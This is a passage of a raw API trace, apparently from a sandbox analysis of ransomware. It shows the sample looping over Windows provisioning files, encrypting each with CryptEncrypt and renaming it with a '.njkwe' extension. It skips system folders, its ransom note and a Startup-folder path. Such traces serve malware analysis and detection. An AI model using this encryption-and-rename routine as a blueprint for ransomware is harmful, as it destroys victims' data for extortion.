lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0082.208] WriteFile (in: hFile=0x444, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0082.208] WriteFile (in: hFile=0x444, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0082.209] CloseHandle (hObject=0x444) returned 1 [0082.209] GetProcessHeap () returned 0xbe0000 [0082.209] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0082.209] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\574__Connections_Cellular_o2 (Germany)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 176 [0082.209] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\574__Connections_Cellular_o2 (Germany)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\574__connections_cellular_o2 (germany)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\574__Connections_Cellular_o2 (Germany)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\574__connections_cellular_o2 (germany)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0082.210] GetProcessHeap () returned 0xbe0000 [0082.210] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0082.210] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x914c2b28, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x914c2b28, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x914c2b28, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x1d3, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="575__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", cAlternateFileName="575__C~1.PRO")) returned 1 [0082.210] lstrcmpiW (lpString1="575__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Windows") returned -1 [0082.210] lstrcmpiW (lpString1="575__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="$Recycle.bin") returned 1 [0082.210] lstrcmpiW (lpString1="575__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="System Volume Information") returned -1 [0082.210] lstrcmpiW (lpString1="575__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Program Files") returned -1 [0082.210] lstrcmpiW (lpString1="575__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Program Files (x86)") returned -1 [0082.210] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\575__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml") returned 147 [0082.210] StrStrIW (lpFirst="575__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpSrch=".njkwe") returned 0x0 [0082.210] lstrcmpW (lpString1="575__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0082.210] lstrcmpW (lpString1="575__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="taridd") returned -1 [0082.210] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\575__Cellular", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0082.210] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\575__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\575__cellular_persimsettings_$(__iccid)_appid.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x444 [0082.211] GetTickCount () returned 0x1154dbf [0082.211] GetTickCount () returned 0x1154dbf [0082.211] GetTickCount () returned 0x1154dbf [0082.211] GetTickCount () returned 0x1154dbf [0082.211] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0082.211] GetProcessHeap () returned 0xbe0000 [0082.211] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc53878 [0082.211] ReadFile (in: hFile=0x444, lpBuffer=0xc53878, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesRead=0x380edc4*=0x1d3, lpOverlapped=0x0) returned 1 [0082.212] SetFilePointerEx (in: hFile=0x444, liDistanceToMove=0xfffffe2d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0082.212] WriteFile (in: hFile=0x444, lpBuffer=0xc53878*, nNumberOfBytesToWrite=0x1d3, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesWritten=0x380edc4*=0x1d3, lpOverlapped=0x0) returned 1 [0082.212] GetProcessHeap () returned 0xbe0000 [0082.212] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc53878 | out: hHeap=0xbe0000) returned 1 [0082.212] SetFilePointerEx (in: hFile=0x444, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.212] WriteFile (in: hFile=0x444, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0082.213] WriteFile (in: hFile=0x444, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0082.213] WriteFile (in: hFile=0x444, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0082.213] CloseHandle (hObject=0x444) returned 1 [0082.213] GetProcessHeap () returned 0xbe0000 [0082.213] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0082.213] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\575__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml_r00t_{3sXlE5}.njkwe") returned 167 [0082.213] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\575__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\575__cellular_persimsettings_$(__iccid)_appid.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\575__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\575__cellular_persimsettings_$(__iccid)_appid.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0082.214] GetProcessHeap () returned 0xbe0000 [0082.214] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0082.214] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x914c2b28, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x914c2b28, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x914c2b28, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2cb, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="576__Connections_Cellular_o2 (Germany)_i0$(__MVID)@WAP.provxml", cAlternateFileName="576__C~1.PRO")) returned 1 [0082.214] lstrcmpiW (lpString1="576__Connections_Cellular_o2 (Germany)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0082.214] lstrcmpiW (lpString1="576__Connections_Cellular_o2 (Germany)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0082.214] lstrcmpiW (lpString1="576__Connections_Cellular_o2 (Germany)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0082.214] lstrcmpiW (lpString1="576__Connections_Cellular_o2 (Germany)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0082.214] lstrcmpiW (lpString1="576__Connections_Cellular_o2 (Germany)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0082.214] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\576__Connections_Cellular_o2 (Germany)_i0$(__MVID)@WAP.provxml") returned 156 [0082.214] StrStrIW (lpFirst="576__Connections_Cellular_o2 (Germany)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0082.214] lstrcmpW (lpString1="576__Connections_Cellular_o2 (Germany)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0082.214] lstrcmpW (lpString1="576__Connections_Cellular_o2 (Germany)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0082.214] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\576__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0082.214] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\576__Connections_Cellular_o2 (Germany)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\576__connections_cellular_o2 (germany)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x444 [0082.215] GetTickCount () returned 0x1154dbf [0082.215] GetTickCount () returned 0x1154dbf [0082.215] GetTickCount () returned 0x1154dbf [0082.215] GetTickCount () returned 0x1154dbf [0082.215] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0082.215] GetProcessHeap () returned 0xbe0000 [0082.215] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc53878 [0082.215] ReadFile (in: hFile=0x444, lpBuffer=0xc53878, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesRead=0x380edc4*=0x2cb, lpOverlapped=0x0) returned 1 [0082.217] SetFilePointerEx (in: hFile=0x444, liDistanceToMove=0xfffffd35, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0082.217] WriteFile (in: hFile=0x444, lpBuffer=0xc53878*, nNumberOfBytesToWrite=0x2cb, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesWritten=0x380edc4*=0x2cb, lpOverlapped=0x0) returned 1 [0082.217] GetProcessHeap () returned 0xbe0000 [0082.217] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc53878 | out: hHeap=0xbe0000) returned 1 [0082.217] SetFilePointerEx (in: hFile=0x444, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.217] WriteFile (in: hFile=0x444, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0082.217] WriteFile (in: hFile=0x444, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0082.217] WriteFile (in: hFile=0x444, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0082.217] CloseHandle (hObject=0x444) returned 1 [0082.217] GetProcessHeap () returned 0xbe0000 [0082.217] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0082.217] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\576__Connections_Cellular_o2 (Germany)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 176 [0082.217] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\576__Connections_Cellular_o2 (Germany)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\576__connections_cellular_o2 (germany)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\576__Connections_Cellular_o2 (Germany)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\576__connections_cellular_o2 (germany)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0082.218] GetProcessHeap () returned 0xbe0000 [0082.218] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0082.218] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x914c2b28, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x914c2b28, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x914c2b28, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2c7, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="577__Connections_Cellular_o2 (Germany)_i0$(__MVID)@WAP.provxml", cAlternateFileName="577__C~1.PRO")) returned 1 [0082.218] lstrcmpiW (lpString1="577__Connections_Cellular_o2 (Germany)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0082.218] lstrcmpiW (lpString1="577__Connections_Cellular_o2 (Germany)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0082.218] lstrcmpiW (lpString1="577__Connections_Cellular_o2 (Germany)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0082.218] lstrcmpiW (lpString1="577__Connections_Cellular_o2 (Germany)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0082.218] lstrcmpiW (lpString1="577__Connections_Cellular_o2 (Germany)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0082.218] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\577__Connections_Cellular_o2 (Germany)_i0$(__MVID)@WAP.provxml") returned 156 [0082.218] StrStrIW (lpFirst="577__Connections_Cellular_o2 (Germany)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0082.218] lstrcmpW (lpString1="577__Connections_Cellular_o2 (Germany)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0082.218] lstrcmpW (lpString1="577__Connections_Cellular_o2 (Germany)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0082.218] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\577__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0082.219] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\577__Connections_Cellular_o2 (Germany)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\577__connections_cellular_o2 (germany)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x444 [0082.219] GetTickCount () returned 0x1154dbf [0082.219] GetTickCount () returned 0x1154dbf [0082.219] GetTickCount () returned 0x1154dbf [0082.219] GetTickCount () returned 0x1154dbf [0082.219] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0082.219] GetProcessHeap () returned 0xbe0000 [0082.219] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc53878 [0082.219] ReadFile (in: hFile=0x444, lpBuffer=0xc53878, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesRead=0x380edc4*=0x2c7, lpOverlapped=0x0) returned 1 [0082.220] SetFilePointerEx (in: hFile=0x444, liDistanceToMove=0xfffffd39, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0082.220] WriteFile (in: hFile=0x444, lpBuffer=0xc53878*, nNumberOfBytesToWrite=0x2c7, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesWritten=0x380edc4*=0x2c7, lpOverlapped=0x0) returned 1 [0082.221] GetProcessHeap () returned 0xbe0000 [0082.221] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc53878 | out: hHeap=0xbe0000) returned 1 [0082.221] SetFilePointerEx (in: hFile=0x444, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.221] WriteFile (in: hFile=0x444, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0082.221] WriteFile (in: hFile=0x444, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0082.221] WriteFile (in: hFile=0x444, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0082.221] CloseHandle (hObject=0x444) returned 1 [0082.221] GetProcessHeap () returned 0xbe0000 [0082.221] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0082.221] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\577__Connections_Cellular_o2 (Germany)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 176 [0082.221] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\577__Connections_Cellular_o2 (Germany)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\577__connections_cellular_o2 (germany)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\577__Connections_Cellular_o2 (Germany)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\577__connections_cellular_o2 (germany)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0082.222] GetProcessHeap () returned 0xbe0000 [0082.222] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0082.222] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x914c2b28, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x914c2b28, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x914c2b28, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2c9, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="578__Connections_Cellular_o2 (Germany)_i0$(__MVID)@WAP.provxml", cAlternateFileName="578__C~1.PRO")) returned 1 [0082.222] lstrcmpiW (lpString1="578__Connections_Cellular_o2 (Germany)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0082.222] lstrcmpiW (lpString1="578__Connections_Cellular_o2 (Germany)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0082.222] lstrcmpiW (lpString1="578__Connections_Cellular_o2 (Germany)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0082.222] lstrcmpiW (lpString1="578__Connections_Cellular_o2 (Germany)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0082.222] lstrcmpiW (lpString1="578__Connections_Cellular_o2 (Germany)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0082.222] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\578__Connections_Cellular_o2 (Germany)_i0$(__MVID)@WAP.provxml") returned 156 [0082.222] StrStrIW (lpFirst="578__Connections_Cellular_o2 (Germany)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0082.222] lstrcmpW (lpString1="578__Connections_Cellular_o2 (Germany)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0082.222] lstrcmpW (lpString1="578__Connections_Cellular_o2 (Germany)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0082.222] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\578__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0082.222] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\578__Connections_Cellular_o2 (Germany)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\578__connections_cellular_o2 (germany)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x444 [0082.223] GetTickCount () returned 0x1154dce [0082.223] GetTickCount () returned 0x1154dce [0082.223] GetTickCount () returned 0x1154dce [0082.223] GetTickCount () returned 0x1154dce [0082.223] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0082.223] GetProcessHeap () returned 0xbe0000 [0082.223] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc53878 [0082.223] ReadFile (in: hFile=0x444, lpBuffer=0xc53878, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesRead=0x380edc4*=0x2c9, lpOverlapped=0x0) returned 1 [0082.225] SetFilePointerEx (in: hFile=0x444, liDistanceToMove=0xfffffd37, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: 